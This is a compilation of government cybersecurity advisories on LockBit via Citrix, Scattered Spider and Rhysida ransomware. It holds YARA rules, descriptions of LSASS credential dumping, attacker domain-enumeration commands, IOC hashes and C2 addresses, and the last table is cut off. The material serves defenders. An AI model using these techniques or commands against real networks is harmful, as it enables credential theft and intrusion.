This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote procedure call (RPC) ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is correctly loaded, then the malware outputs the message "[*]success" in the console.
rule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation { meta: author = "CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities = "steals-authentication-credentials" malware_type = "trojan" tool_type = "credential-exploitation" description = "Detects trojan DLL samples" sha256 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994" strings: $s1 = { 64 65 6c 65 74 65 } $s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e } $s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 } $s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 } $s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 } $s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 } condition: uint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of them } |
This file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:UsersPublic.
Next, a.dll loads DbgCore.dll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, the file a.bat specifies that the file a.png is used to create the cabinet file called a.cab in the path C:WindowsTasks.
rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access { meta: author = "CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities = "communicates-with-c2" malware_type = "backdoor" tool_type = "remote-access" description = "Detects trojan python samples" sha256 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6" strings: $s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 } $s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a } $s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 } $s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 } condition: all of them } |
This file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword "hashpasswd" is present. If the keyword "hashpasswd" is not present, then the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script has the ability to execute command line arguments on the remote machine. If there is no command specified, then a default command of “whoami” is run.
|
Organizations are encouraged to assess Citrix software and your systems for evidence of compromise, and to hunt for malicious activity (see Additional Resources section).If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software as well as installing malicious code.
If a potential compromise is detected, organizations should:
These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software. CISA and authoring organizations recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of exploitation such as threat actors leveraging unpatched vulnerabilities within Citrix NetScaler appliances, which strengthens the security posture of their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The authoring organizations of this CSA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix CVE 2023-4966 and LockBit 3.0 ransomware & ransomware affiliates. These mitigations align with the Cross-Sector Cybersecurity performance goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and the authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.
Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD’s ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations.
Boeing contributed to this CSA.
[1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966
[2] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966
[3] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)
November 21, 2023: Initial version.
]]>
The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023.
Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.
The FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of a cyberattack by Scattered Spider actors.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Scattered Spider (also known as Starfraud, UNC3944, Scatter Swine, and Muddled Libra) engages in data extortion and several other criminal activities.[1] Scattered Spider threat actors are considered experts in social engineering and use multiple social engineering techniques, especially phishing, push bombing, and subscriber identity module (SIM) swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication (MFA). According to public reporting, Scattered Spider threat actors have [2],[3],[4]:
After gaining access to networks, FBI observed Scattered Spider threat actors using publicly available, legitimate remote access tunneling tools. Table 1 details a list of legitimate tools Scattered Spider, repurposed and used for their criminal activity. Note: The use of these legitimate tools alone is not indicative of criminal activity. Users should review the Scattered Spider indicators of compromise (IOCs) and TTPs discussed in this CSA to determine whether they have been compromised.
Tool |
Intended Use |
Fleetdeck.io |
Enables remote monitoring and management of systems. |
Level.io |
Enables remote monitoring and management of systems. |
Mimikatz [S0002] |
Extracts credentials from a system. |
Ngrok [S0508] |
Enables remote access to a local web server by tunneling over the internet. |
Pulseway |
Enables remote monitoring and management of systems. |
Screenconnect |
Enables remote connections to network devices for management. |
Splashtop |
Enables remote connections to network devices for management. |
Tactical.RMM |
Enables remote monitoring and management of systems. |
Tailscale |
Provides virtual private networks (VPNs) to secure network communications. |
Teamviewer |
Enables remote connections to network devices for management. |
In addition to using legitimate tools, Scattered Spider also uses malware as part of its TTPs. See Table 2 for some of the malware used by Scattered Spider.
Malware |
Use |
AveMaria (also known as WarZone [S0670]) |
Enables remote access to a victim’s systems. |
Raccoon Stealer |
Steals information including login credentials [TA0006], browser history [T1217], cookies [T1539], and other data. |
VIDAR Stealer |
Steals information including login credentials, browser history, cookies, and other data. |
Scattered Spider threat actors have historically evaded detection on target networks by using living off the land techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs.
Observably, Scattered Spider threat actors have exfiltrated data [TA0010] after gaining access and threatened to release it without deploying ransomware; this includes exfiltration to multiple sites including U.S.-based data centers and MEGA[.]NZ [T1567.002].
More recently, the FBI has identified Scattered Spider threat actors now encrypting victim files after exfiltration [T1486]. After exfiltrating and/or encrypting data, Scattered Spider threat actors communicate with victims via TOR, Tox, email, or encrypted applications.
Scattered Spider intrusions often begin with broad phishing [T1566] and smishing [T1660] attempts against a target using victim-specific crafted domains, such as the domains listed in Table 3 [T1583.001].
Domains |
victimname-sso[.]com |
victimname-servicedesk[.]com |
victimname-okta[.]com |
In most instances, Scattered Spider threat actors conduct SIM swapping attacks against users that respond to the phishing/smishing attempt. The threat actors then work to identify the personally identifiable information (PII) of the most valuable users that succumbed to the phishing/smishing, obtaining answers for those users’ security questions. After identifying usernames, passwords, PII [T1589], and conducting SIM swaps, the threat actors then use social engineering techniques [T1656] to convince IT help desk personnel to reset passwords and/or MFA tokens [T1078.002],[T1199],[T1566.004] to perform account takeovers against the users in single sign-on (SSO) environments.
Scattered Spider threat actors then register their own MFA tokens [T1556.006],[T1606] after compromising a user’s account to establish persistence [TA0003]. Further, the threat actors add a federated identity provider to the victim’s SSO tenant and activate automatic account linking [T1484.002]. The threat actors are then able to sign into any account by using a matching SSO account attribute. At this stage, the Scattered Spider threat actors already control the identity provider and then can choose an arbitrary value for this account attribute. As a result, this activity allows the threat actors to perform privileged escalation [TA0004] and continue logging in even when passwords are changed [T1078]. Additionally, they leverage common endpoint detection and response (EDR) tools installed on the victim networks to take advantage of the tools’ remote-shell capabilities and executing of commands which elevates their access. They also deploy remote monitoring and management (RMM) tools [T1219] to then maintain persistence.
Once persistence is established on a target network, Scattered Spider threat actors often perform discovery, specifically searching for SharePoint sites [T1213.002], credential storage documentation [T1552.001], VMware vCenter infrastructure [T1018], backups, and instructions for setting up/logging into Virtual Private Networks (VPN) [TA0007]. The threat actors enumerate the victim’s Active Directory (AD), perform discovery and exfiltration of victim’s code repositories [T1213.003], code-signing certificates [T1552.004], and source code [T1083],[TA0010]. Threat actors activate Amazon Web Services (AWS) Systems Manager Inventory [T1538] to discover targets for lateral movement [TA0007],[TA0008], then move to both preexisting [T1021.007] and actor-created [T1578.002] Amazon Elastic Compute Cloud (EC2) instances. In instances where the ultimate goal is data exfiltration, Scattered Spider threat actors use actor-installed extract, transform, and load (ETL) tools [T1648] to bring data from multiple data sources into a centralized database [T1074],[T1530]. According to trusted third parties, where more recent incidents are concerned, Scattered Spider threat actors may have deployed BlackCat/ALPHV ransomware onto victim networks—thereby encrypting VMware Elastic Sky X integrated (ESXi) servers [T1486].
To determine if their activities have been uncovered and maintain persistence, Scattered Spider threat actors often search the victim’s Slack, Microsoft Teams, and Microsoft Exchange online for emails [T1114] or conversations regarding the threat actor’s intrusion and any security response. The threat actors frequently join incident remediation and response calls and teleconferences, likely to identify how security teams are hunting them and proactively develop new avenues of intrusion in response to victim defenses. This is sometimes achieved by creating new identities in the environment [T1136] and is often upheld with fake social media profiles [T1585.001] to backstop newly created identities.
See Tables 4 through 17 for all referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Gather Victim Identity Information |
Scattered Spider threat actors gather usernames, passwords, and PII for targeted organizations. |
|
Phishing for Information |
Scattered Spider threat actors use phishing to obtain login credentials, gaining access to a victim’s network. |
Technique Title |
ID |
Use |
Acquire Infrastructure: Domains |
Scattered Spider threat actors create domains for use in phishing and smishing attempts against targeted organizations. |
|
Establish Accounts: Social Media Accounts |
Scattered Spider threat actors create fake social media profiles to backstop newly created user accounts in a targeted organization. |
Technique Title |
ID |
Use |
---|---|---|
Phishing |
Scattered Spider threat actors use broad phishing attempts against a target to obtain information used to gain initial access. Scattered Spider threat actors have posed as helpdesk personnel to direct employees to install commercial remote access tools. |
|
Phishing (Mobile) |
Scattered Spider threat actors send SMS messages, known as smishing, when targeting a victim. |
|
Phishing: Spearphishing Voice |
Scattered Spider threat actors use voice communications to convince IT help desk personnel to reset passwords and/or MFA tokens. |
|
Trusted Relationship |
Scattered Spider threat actors abuse trusted relationships of contracted IT help desks to gain access to targeted organizations. |
|
Valid Accounts: Domain Accounts |
Scattered Spider threat actors obtain access to valid domain accounts to gain initial access to a targeted organization. |
Technique Title |
ID |
Use |
Serverless Execution |
Scattered Spider threat actors use ETL tools to collect data in cloud environments. |
|
User Execution |
Scattered Spider threat actors impersonating helpdesk personnel direct employees to run commercial remote access tools thereby enabling access to the victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Persistence |
Scattered Spider threat actors seek to maintain persistence on a targeted organization’s network. |
|
Create Account |
Scattered Spider threat actors create new user identities in the targeted organization. |
|
Modify Authentication Process: Multi-Factor Authentication |
Scattered Spider threat actors may modify MFA tokens to gain access to a victim’s network. |
|
Valid Accounts |
Scattered Spider threat actors abuse and control valid accounts to maintain network access even when passwords are changed. |
Technique Title |
ID |
Use |
---|---|---|
Privilege Escalation |
Scattered Spider threat actors escalate account privileges when on a targeted organization’s network. |
|
Domain Policy Modification: Domain Trust Modification |
Scattered Spider threat actors add a federated identify provider to the victim’s SSO tenant and activate automatic account linking. |
Technique Title |
ID |
Use |
---|---|---|
Modify Cloud Compute Infrastructure: Create Cloud Instance |
Scattered Spider threat actors will create cloud instances for use during lateral movement and data collection. |
|
Impersonation |
Scattered Spider threat actors pose as company IT and/or helpdesk staff to gain access to victim’s networks. Scattered Spider threat actors use social engineering to convince IT help desk personnel to reset passwords and/or MFA tokens. |
Technique Title |
ID |
Use |
---|---|---|
Credential Access |
Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain login credentials. |
|
Forge Web Credentials |
Scattered Spider threat actors may forge MFA tokens to gain access to a victim’s network. |
|
Multi-Factor Authentication Request Generation |
Scattered Spider sends repeated MFA notification prompts to lead employees to accept the prompt and gain access to the target network. |
|
Unsecured Credentials: Credentials in Files |
Scattered Spider threat actors search for insecurely stored credentials on victim’s systems. |
|
Unsecured Credentials: Private Keys |
Scattered Spider threat actors search for insecurely stored private keys on victim’s systems. |
Technique Title |
ID |
Use |
Discovery |
Upon gaining access to a targeted network, Scattered Spider threat actors seek out SharePoint sites, credential storage documentation, VMware vCenter, infrastructure backups and enumerate AD to identify useful information to support further operations. |
|
Browser Information Discovery |
Scattered Spider threat actors use tools (e.g., Raccoon Stealer) to obtain browser histories. |
|
Cloud Service Dashboard |
Scattered Spider threat actors leverage AWS Systems Manager Inventory to discover targets for lateral movement. |
|
File and Directory Discovery |
Scattered Spider threat actors search a compromised network to discover files and directories for further information or exploitation. |
|
Remote System Discovery |
Scattered Spider threat actors search for infrastructure, such as remote systems, to exploit. |
|
Steal Web Session Cookie |
Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain browser cookies. |
Technique Title |
ID |
Use |
Lateral Movement |
Scattered Spider threat actors laterally move across a target network upon gaining access and establishing persistence. |
|
Remote Services: Cloud Services |
Scattered Spider threat actors use pre-existing cloud instances for lateral movement and data collection. |
Technique Title |
ID |
Use |
Data from Information Repositories: Code Repositories |
Scattered Spider threat actors search code repositories for data collection and exfiltration. |
|
Data from Information Repositories: Sharepoint |
Scattered Spider threat actors search SharePoint repositories for information. |
|
Data Staged |
Scattered Spider threat actors stage data from multiple data sources into a centralized database before exfiltration. |
|
Email Collection |
Scattered Spider threat actors search victim’s emails to determine if the victim has detected the intrusion and initiated any security response. |
|
Data from Cloud Storage |
Scattered Spider threat actors search data in cloud storage for collection and exfiltration. |
Technique Title |
ID |
Use |
---|---|---|
Remote Access Software |
Impersonating helpdesk personnel, Scattered Spider threat actors direct employees to run commercial remote access tools thereby enabling access to and command and control of the victim’s network. Scattered Spider threat actors leverage third-party software to facilitate lateral movement and maintain persistence on a target organization’s network. |
Technique Title |
ID |
Use |
---|---|---|
Exfiltration |
Scattered Spider threat actors exfiltrate data from a target network to for data extortion. |
Technique Title |
ID |
Use |
---|---|---|
Data Encrypted for Impact |
Scattered Spider threat actors recently began encrypting data on a target network and demanding a ransom for decryption. Scattered Spider threat actors has been observed encrypting VMware ESXi servers. |
|
Exfiltration Over Web Service: Exfiltration to Cloud Storage |
Scattered Spider threat actors exfiltrate data to multiple sites including U.S.-based data centers and MEGA[.]NZ. |
|
Financial Theft |
Scattered Spider threat actors monetized access to victim networks in numerous ways including extortion-enabled ransomware and data theft. |
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actor activity and to reduce the risk of compromise by Scattered Spider threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
FBI and CISA are seeking any information that can be shared, to include a sample ransom note, communications with Scattered Spider group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, report the incident to the FBI Internet Crime Complaint Center (IC3) at IC3.gov, or CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).
[1] MITRE ATT&CK – Scattered Spider
[2] Trellix - Scattered Spider: The Modus Operandi
[3] Crowdstrike - Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies
[4] Crowdstrike - SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security
[5] Malwarebytes - Ransomware group steps up, issues statement over MGM Resorts compromise
The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.
November 16, 2023: Initial version.
]]>Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.
FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Rhysida ransomware and other ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the ATT&CK Tactics and Techniques section for tables mapped to the threat actors’ activity.
Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Open source reporting details similarities between Vice Society (DEV-0832)[1] activity and the actors observed deploying Rhysida ransomware. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Any ransoms paid are then split between the group and the affiliates.
For additional information on Vice Society actors and associated activity, see the joint CSA #StopRansomware: Vice Society.
Rhysida actors have been observed leveraging external-facing remote services to initially access and persist within a network. Remote services, such as virtual private networks (VPNs), allow users to connect to internal enterprise network resources from external locations. Rhysida actors have commonly been observed authenticating to internal VPN access points with compromised valid credentials [T1078], notably due to organizations lacking MFA enabled by default. Additionally, actors have been observed exploiting Zerologon (CVE-2020-1472)—a critical elevation of privileges vulnerability in Microsoft’s Netlogon Remote Protocol [T1190]—as well as conducting successful phishing attempts [T1566]. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3]
Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Living off the land techniques include using native (built into the operating system) network administration tools to perform operations. This allows the actors to evade detection by blending in with normal Windows systems and network activities.
Ipconfig
[T1016], whoami
[T1033], nltest
[T1482], and several net
commands have been used to enumerate victim environments and gather information about domains. In one instance of using compromised credentials, actors leveraged net
commands within PowerShell to identify logged-in users and performed reconnaissance on network accounts within the victim environment. Note: The following commands were not performed in the exact order listed.
net user [username] /domain
[T1087.002]net group “domain computers” /domain
[T1018]net group “domain admins” /domain
[T1069.002]net localgroup administrators
[T1069.001]Analysis of the master file table (MFT)[4] identified the victim system generated the ntuser.dat
registry hive, which was created when the compromised user logged in to the system for the first time. This was considered anomalous due to the baseline of normal activity for that particular user and system. Note: The MFT resides within the New Technology File System (NTFS) and houses information about a file including its size, time and date stamps, permissions, and data content.
Table 1 lists legitimate tools Rhysida actors have repurposed for their operations. The legitimate tools listed in this joint CSA are all publicly available. Use of these tools should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actors.
Disclaimer: Organizations are encouraged to investigate and vet use of these tools prior to performing remediation actions.
Name |
Description |
cmd.exe |
The native command line prompt utility. |
PowerShell.exe |
A native command line tool used to start a Windows PowerShell session in a Command Prompt window. |
PsExec.exe |
A tool included in the PsTools suite used to execute processes remotely. Rhysida actors heavily leveraged this tool for lateral movement and remote execution. |
mstsc.exe |
A native tool that establishes an RDP connection to a host. |
PuTTY.exe |
Rhysida actors have been observed creating Secure Shell (SSH) PuTTy connections for lateral movement. In one example, analysis of PowerShell console host history for a compromised user account revealed Rhysida actors leveraged PuTTy to remotely connect to systems via SSH [T1021.004]. |
PortStarter |
A back door script written in Go that provides functionality for modifying firewall settings and opening ports to pre-configured command and control (C2) servers.[1] |
secretsdump |
A script used to extract credentials and other confidential information from a system. Rhysida actors have been observed using this for NTDS dumping [T1003.003] in various instances. |
ntdsutil.exe |
A standard Windows tool used to interact with the NTDS database. Rhysida actors used this tool to extract and dump the Note: It is strongly recommended that organizations conduct domain-wide password resets and double Kerberos TGT password resets if any indication is found that the |
AnyDesk |
A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer. |
wevtutil.exe |
A standard Windows Event Utility tool used to view event logs. Rhysida actors used this tool to clear a significant number of Windows event logs, including system, application, and security logs [T1070.001]. |
PowerView |
A PowerShell tool used to gain situational awareness of Windows domains. Review of PowerShell event logs identified Rhysida actors using this tool to conduct additional reconnaissance-based commands and harvest credentials. |
In one investigation, Rhysida actors created two folders in the C: drive labeled in
and out
, which served as a staging directory (central location) for hosting malicious executables. The in
folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out
folder contained various files listed in Table 2 below. Rhysida actors deployed these tools and scripts to assist system and network-wide encryption.
File Name |
Hash (SHA256) |
Description |
conhost.exe |
6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010 |
A ransomware binary. |
psexec.exe |
078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b |
A file used to execute a process on a remote or local host. |
S_0.bat |
1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597 |
A batch script likely used to place |
1.ps1 |
4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183 |
Identifies an extension block list of files to encrypt and not encrypt. |
S_1.bat |
97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4 |
A batch script that copies |
S_2.bat |
918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1 |
Executes |
Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go. The cryptographic ransomware application first injects the PE into running processes on the compromised system [T1055.002]. Additionally, third-party researchers identified evidence of Rhysida actors developing custom tools with program names set to “Rhysida-0.1” [T1587].
After mapping the network, the ransomware encrypts data using a 4096-bit RSA encryption key with a ChaCha20 algorithm [T1486]. The algorithm features a 256-bit key, a 32-bit counter, and a 96-bit nonce along with a four-by-four matrix of 32-bit words in plain text. Registry modification commands [T1112] are not obfuscated, displayed as plain-text strings and executed via cmd.exe
.
Rhysida’s encryptor runs a file to encrypt and modify all encrypted files to display a .rhysida
extension.[5] Following encryption, a PowerShell command deletes the binary [T1070.004] from the network using a hidden command window [T1564.003]. The Rhysida encryptor allows arguments -d
(select a directory) and -sr
(file deletion), defined by the authors of the code as parseOptions.[6] After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection.
Rhysida actors reportedly engage in “double extortion” [T1657]—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.[5],[7] Rhysida actors direct victims to send ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. As shown in Figure 1, Rhysida ransomware drops a ransom note named “CriticalBreachDetected” as a PDF file—the note provides each company with a unique code and instructions to contact the group via a Tor-based portal.
Identified in analysis and also listed in open source reporting, the contents of the ransom note are embedded as plain-text in the ransom binary, offering network defenders an opportunity to deploy string-based detection for alerting on evidence of the ransom note. Rhysida threat actors may target systems that do not use command-line operating systems. The format of the PDF ransom notes could indicate that Rhysida actors only target systems that are compatible with handling PDF documents.[8]
On November 10, 2023, Sophos published TTPs and IOCs identified from analysis conducted for six separate incidents.[9] The C2 IP addresses listed in Table 3 were derived directly from Sophos’ investigations and are listed on GitHub among other indicators.[10]
C2 IP Address |
---|
5.39.222[.]67 |
5.255.99[.]59 |
51.77.102[.]106 |
108.62.118[.]136 |
108.62.141[.]161 |
146.70.104[.]249 |
156.96.62[.]58 |
157.154.194[.]6 |
Additional IOCs were obtained from FBI, CISA, and the MS-ISAC’s investigations and analysis. The email addresses listed in Table 4 are associated with Rhysida actors’ operations. Rhysida actors have been observed creating Onion Mail email accounts for services or victim communication, commonly in the format: [First Name][Last Name]@onionmail[.]org
.
Email Address |
---|
rhysidaeverywhere@onionmail[.]org |
rhysidaofficial@onionmail[.]org |
Rhysida actors have also been observed using the following files and executables listed in Table 5 to support their operations.
Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions.
File Name |
Hash (SHA256) |
Sock5.sh |
48f559e00c472d9ffe3965ab92c6d298f8fb3a3f0d6d203cd2069bfca4bf3a57 |
PsExec64.exe |
edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef |
PsExec.exe |
078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b |
PsGetsid64.exe |
201d8e77ccc2575d910d47042a986480b1da28cf0033e7ee726ad9d45ccf4daa |
PsGetsid.exe |
a48ac157609888471bf8578fb8b2aef6b0068f7e0742fccf2e0e288b0b2cfdfb |
PsInfo64.exe |
de73b73eeb156f877de61f4a6975d06759292ed69f31aaf06c9811f3311e03e7 |
PsInfo.exe |
951b1b5fd5cb13cde159cebc7c60465587e2061363d1d8847ab78b6c4fba7501 |
PsLoggedon64.exe |
fdadb6e15c52c41a31e3c22659dd490d5b616e017d1b1aa6070008ce09ed27ea |
PsLoggedon.exe |
d689cb1dbd2e4c06cd15e51a6871c406c595790ddcdcd7dc8d0401c7183720ef |
PsService64.exe |
554f523914cdbaed8b17527170502199c185bd69a41c81102c50dbb0e5e5a78d |
PsService.exe |
d3a816fe5d545a80e4639b34b90d92d1039eb71ef59e6e81b3c0e043a45b751c |
Eula.txt |
8329bcbadc7f81539a4969ca13f0be5b8eb7652b912324a1926fc9bfb6ec005a |
psfile64.exe |
be922312978a53c92a49fefd2c9f9cc098767b36f0e4d2e829d24725df65bc21 |
psfile.exe |
